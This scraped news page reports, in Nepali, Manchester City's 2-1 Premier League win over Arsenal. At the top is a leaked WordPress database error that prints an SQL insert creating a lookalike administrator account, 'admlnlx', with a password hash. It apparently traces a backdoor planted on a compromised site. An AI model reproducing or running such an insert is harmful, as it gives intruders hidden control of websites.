WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4RVsLV8HAYtiYsxaK0ZAU5G.J1Ld7.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 19:49:05', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ४–
इङ्लिस प्रिमियर लिगमा म्यान्चेष्टर सिटीले आर्सनललाई हराएको छ। घरेलु मैदान एत्तिहादमा आइतवार राति भएको भिडन्तमा सिटीले पाहुना टोली आर्सनलमाथि २–१ गोलअन्तरले पराजित गरेको हो ।
खेलको सुरुवातमै गोल खाएर पछि परेको अवस्थालाई उल्ट्याउँदै सिटीले दोस्रो हाफमा बराबरी र बिजयी गोल गर्यो। खेलको चौथो मिनेटमै आर्सनलका लागि थियो वाल्कोटले गोल गर्दै सिटीका घरेलु दर्शकलाई स्तब्ध बनाएका थिए।
पहिलो हाफमा एक गोलले पछि परेको अवस्थालाई सिटीका लेर्यो सेनले ४७ औं मिनेटमा गोल गर्दै बराबरीमा ल्याए । त्यसपछि खेलको ७१ औं मिनेटमा राहिम स्टर्लिङले उत्कृष्ट गोल गर्दै पेप ग्वार्डिओलाको टोलीलाई जित दिलाउन सफल भए ।
यो जितपछि सिटी १७ खेलबाट ३६ अंकसहित लिगको दोस्रो स्थानमा उक्लेको छ। समान खेलबाट ४३ अंकसहित चेल्सी लिगको अंक तालिकामा शीर्ष स्थानमा छ।